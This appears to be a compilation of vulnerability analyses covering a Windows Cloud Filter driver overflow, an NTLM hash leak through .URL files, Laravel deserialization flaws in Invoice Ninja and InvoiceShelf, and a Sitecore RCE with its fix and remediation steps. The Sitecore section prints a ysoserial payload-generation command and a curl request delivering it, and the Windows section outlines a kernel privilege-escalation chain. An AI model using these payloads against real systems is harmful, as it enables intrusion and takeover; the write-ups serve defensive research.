CVE-2024-30085 is a heap-based buffer overflow in the Windows Cloud Filter Mini Driver. The driver works as part of a system to update and sync files locally with a remote server. The vulnerability works because two checks to prevent the buffer overflow are incomplete and can be bypassed. The attack is non-trivial and requires multiple heap sprays and overflows to gain both a read primitive and a write primitive. Because it is complex and requires access, it makes sense that the CVSS score is not higher. That said, Windows Workstations and servers from 2018 to 2023 are vulnerable, so the target surface is large.

The first inadequate check is a length check before calling memcpy to copy bitmap data associated with the reparse point. The destination buffer is of size 0x1000, and the data in question is a specific object, so the data will likely not exceed the size unless the object is maliciously-formed. The check is bypassed if the reparse point’s hasBuf value is false, and unfortunately, the value is controlled by a regular user. When the attacker creates the reparse point data, they can just set that flag to false and no bounds check will occur.
A second protection to bypass is that a file cannot be created and set as a reparse point within a sync root- unfortunately, this check takes place at the time a file is created. The bypass is simply to create the file in a directory, pass the check, and move the directory into the sync root, as required.
The weaponized PoC released for this exploit uses two separate buffer overflows to gain a read primitive, and then a write primitive. The first overflow sprays the heap with ALPC handle objects and _WNF_STATE_DATA objects, with the goal of creating a too-large _WNF_STATE_DATA object gaining access to an ALPC handle object which delivers both a leak for the current process’s security token and the ability to add a write primitive by inserting an ALPC_RESERVE object into a linked list.
A second spray and overflow is used to corrupt a second _WNF_STATE_DATA object with the goal of gaining access to a PipeAttribute structure that was sprayed into the heap. If an attacker gains access to a single PipeAttribute struct, they can add a new element in the linked-list of PipeAttribute kernel structures in user-land memory accessible to the attacking process. Gaining control of a PipeAttribute structure gives the attacker to perform arbitrary kernel memory reads using a technique outlined here: https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf
The arbitrary read allows the attacker to read data from the leaked ALPC handle table address (the first overflow) that gives the attacker the ability to read their own security token by following the address listed in the ALPC object it created.
Because the attacker also has control of the _WNF_STATE_DATA object overwriting the ALPC object, they can insert another ALPC object from user memory into the list, much the same way they did with the PipeAttribute structure, except that while the PipeAttribute structure gave the ability to read, the ALPC structure gives the ability to write, as the new controllable structure will send a message, but the attacker controls both the message to send and the address where the message should be written.
In one PoC, the attacker locates the system process’s token, reads it with the read primitive, and then places it in the message with the current process’s token address as the destination. A second PoC uses a hard-coded value for the token and overwrites it in the same way.

CVE-2024-43451 is a Windows NTLM hash disclosure vulnerability categorized as a “spoofing” flaw that affects all supported Microsoft Windows versions, including Windows 10, Windows 11, and Windows Server editions.

The vulnerability stems from how Windows handles Internet Shortcut (.URL) files, exploiting a weakness in the outdated MSHTML (Internet Explorer) engine still present in the OS.

An attacker can craft a malicious .URL file pointing to a network path (UNC) hosted on an attacker-controlled server. When Windows Explorer or related components interact with this file, the system automatically attempts to retrieve remote resources over SMB, triggering an NTLM authentication handshake without requiring user approval.

Essentially, as soon as the file is engaged, Windows “calls out” to the attacker’s SMB server, sending the user’s NTLMv2 hash (hashed credentials) for authentication.

The vulnerability arises because seemingly harmless file interactions—such as previewing, moving, or right-clicking a .URL shortcut—cause the Windows shell to invoke the MSHTML/Explorer subsystem to fetch external content, such as an icon or target path.

Since the path can be a remote SMB share (file:// URI or UNC), Windows automatically performs NTLM authentication with that remote server, unknowingly leaking the NTLMv2 password hash to the attacker.

This flaw does not execute arbitrary code directly but compromises confidentiality by exposing credentials.

With the stolen hash, an attacker can impersonate the user on a network by performing a pass-the-hash attack, allowing them to authenticate without needing the user’s plaintext password.

Laravel PHP applications can be exploited due to bad implementations of decryption mechanisms. Synacktiv published this advisory where you can pull off arbitrary unserialization via decrypt in the application Invoice Ninja. I am not gonna dwell on the actual attack scenario because this is pretty good described in the Synacktiv advisory.

More interesting is the use of the Laravel Crypto Killer tool that was designed by Synacktiv team to support this type of attacks.
Having this toolkit available in Metasploit that can be leveraged in the different exploits that are subject to these bad implementations of decryption mechanisms in Laravel PHP applications would be a welcome addition.

Therefore I created the LaravelCryptoKiller mixin in combination with the Invoice Ninja exploit that automates these attacks.
You can find them both in this PR submission Invoice Ninja unauthenticated RCE [CVE-2024-55555] + Laravel Crypto Killer mixin #19897.

References

CVE-2024-55555
Laravel HackTricks
Invoice Ninja security disclosure from Synacktiv
Invoice Ninja unauthenticated RCE [CVE-2024-55555] + Laravel Crypto Killer mixin #19897

Credits

Rémi Matasse and Mickaël Benassouli from Synacktiv

Overview

On January 6, 2025, Sitecore published a security bulletin, SC2024-002-624693 , for a critical unauthenticated remote code execution (RCE) vulnerability affecting the products Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4. On February 20, 2025 the vulnerability was assigned CVE-2025-27218. The vulnerability is the result of deserializing attacker controlled data originating from an HTTP GET request. An unauthenticated and remote attacker can execute arbitrary commands by sending a base64 encoded serialized .NET object into the ThumbnailsAccessToken HTTP header.

Analysis

Our analysis is based upon a vulnerable version of Sitecore XM 10.4 ( Sitecore.Kernell.dll version 19.4.84 ).

Vulnerability

The vulnerability lies in the screenshot functionality for generating thumbnails. It works by taking a screenshot of the page with phantomjs, then resizing the image. To begin to analyze CVE-2025-27218, we will first view the vendor supplied hotfix. The hotfix removes the Sitecore.Thumbnails.Pipelines.AuthenticateThumbnailsRequest processor from the httpRequestBegin pipeline.

<configuration xmlns:patch="http://www.sitecore.net/xmlconfig/" xmlns:role="http://www.sitecore.net/xmlconfig/role/">
	<sitecore role:require="Standalone or ContentManagement or XMCloud">
		<pipelines>
			<httpRequestBegin>
				<processor type="Sitecore.Thumbnails.Pipelines.AuthenticateThumbnailsRequest, Sitecore.Kernel" resolve="true">
					<patch:delete />
				</processor>
			</httpRequestBegin>			
		</pipelines>
		<settings>
			<setting name="Sitecore.ThumbnailsGeneration.Enabled">
				<patch:attribute name="value">false</patch:attribute>
			</setting>
		</settings>
	</sitecore>
</configuration>

We can view the code of the disabled function by opening Sitecore.Kernel.dll in a .NET disassembler and browsing to the
AuthenticateThumbnailsRequest class in the Sitecore.Thumbnails.Pipelines namespace. The class grabs an HTTP request, checks if a header is valid with _tokenService.IsTokenValid, and authenticates the request as a user if it returns true.

		public override void Process(HttpRequestArgs args)
		{
			string text;
			if (args == null)
			{
				text = null;
			}
			else
			{
				HttpContextBase httpContext = args.HttpContext;
				if (httpContext == null)
				{
					text = null;
				}
				else
				{
					HttpRequestBase request = httpContext.Request;
					text = ((request != null) ? request.Headers[ThumbnailFlowBase.TokenName] : null);
				}
			}
			string text2 = text;
			if (!this._tokenService.IsTokenValid(text2))
			{
				return;
			}
			string generatorUserName = this._settings.GeneratorUserName;
			User user = null;
			if (!User.Exists(generatorUserName))
			{
				object @lock = AuthenticateThumbnailsRequest.Lock;
				lock (@lock)
				{
					if (!User.Exists(generatorUserName))
					{
						user = User.Create(generatorUserName, "b");
						user.Profile.IsAdministrator = true;
						user.Profile.Save();
						MembershipUser user2 = this.GetUser(generatorUserName);
						user2.ResetPassword();
					}
					goto IL_B6;
				}
			}
			user = User.FromName(generatorUserName, true);
			IL_B6:
			this._authManager.Login(user);
		}

Viewing the IsTokenValid method in the MachineKeyTokenService in the Sitecore.Thumbnails namespace, we can see the token is processed in the Convert.Base64ToObjectmethod.

		public bool IsTokenValid(string token)
		{
			bool flag;
			try
			{
				byte[] array = Convert.Base64ToObject(token) as byte[];
				byte[] array2 = MachineKey.Unprotect(array, Array.Empty<string>());
				if (array2 == null || array2.Length == 0)
				{
					flag = false;
				}
				else
				{
					Guid guid = new Guid(array2);
					flag = guid == this._token;
				}
			}
			catch
			{
				flag = false;
			}
			return flag;
		}

The token name can be found in the ThumbnailFlowBase class in the Sitecore.Thumbnails namespace, which contains the method for taking screenshots along with others.

public static string TokenName { get; } = "ThumbnailsAccessToken";

This method was previously leveraged for a critical RCE vulnerability discovered by Assetnote, which Sitecore provides a patch for in their SC2023-001-568150 security bulletin. The method base64 decodes the string and deserializes it with BinaryFormatter.

public static object Base64ToObject(string data)
{
    Error.AssertString(data, "data", true);
    if (data.Length > 0)
    {
        try
        {
            byte[] buffer = Convert.FromBase64String(data);
            BinaryFormatter binaryFormatter = new BinaryFormatter();
            MemoryStream serializationStream = new MemoryStream(buffer);
            return binaryFormatter.Deserialize(serializationStream);
        }
        catch (Exception exception)
        {
            Log.Error("Error converting data to base64.", exception, typeof(Convert));
        }
    }
    return null;
}

ysoserial.net can be used to generate a payload with shell commands.

PS C:\Users\admin1\Desktop\ysoserial-1.36_\Release> .\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "ipconfig > \inetpub\wwwroot\XP0.sc\upload\pwn.txt"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpd...

Sending the payload in the ThumbnailsAccessToken will run the command.

curl -k https://xp0.sc/ -H "ThumbnailsAccessToken: AAEAAAD/////AQAAAAAAAAAEAQAAAClTe..." -v

The Fix

The token is parsed as a string instead of a object, so it isn’t deserialized.

		public bool IsTokenValid(string token)
		{
			bool flag;
			try
			{
				byte[] array = Convert.FromBase64String(token);
				byte[] array2 = MachineKey.Unprotect(array, Array.Empty<string>());
				if (array2 == null || array2.Length == 0)
				{
					flag = false;
...

Remediation

For on prem and PaaS installations, apply the hotfix in KB1002844 , provided by Sitecore.
Validate that the updated version is installed by viewing the properties of the Sitecore.Kernel.dll and ensuring that the version is higher or equal to 19.4.93.21984

Another option is to download a config file that disables the vulnerable functionality from Sitecore’s security bulletin, then place it in the \App_Confing\Include\zzz folder.

This vulnerability has a similar attack surface as the one described in CVE-2024-55555 where Laravel based applications can be exploited due to bad decryption implementations. In this case, an attacker in possession of the secret Laravel APP_KEY would therefore be able to retrieve the Laravel cookie, uncipher it and modify the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve remote command execution. The attack sequence is very well described in this security advisory of Synacktiv.
InvoiceShelf is an example of a Laravel PHP based application where this vulnerability can be abused. InvoiceShelf version 1.3.0 and lower, which is a fork of Crater Invoice, is vulnerable.

As discussed in my other attackerkb article, you can use the LaravelCrytpoKiller mixin to exploit this type of vulnerabilities using Metasploit. Therefore I created a Metasploit module targeting vulnerable InvoiceShelf applications to automate and demonstrate this attack.
You can find the module in this PR submission InvoiceShelf unauthenticated PHP deserialization vulnerability.

References

CVE-2024-55556
Laravel HackTricks
InvoiceShelf security disclosure from Synacktiv
Metasploit InvoiceShelf unauthenticated PHP deserialization vulnerability
InvoiceShelf Github

Credits

Rémi Matasse and Mickaël Benassouli from Synacktiv

Microsoft released a report observing a state-sponsored actor called Silk Typhoon abusing this vulnerability, hence we added a the tag to reflect this.
The report from Microsoft can be found here: https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/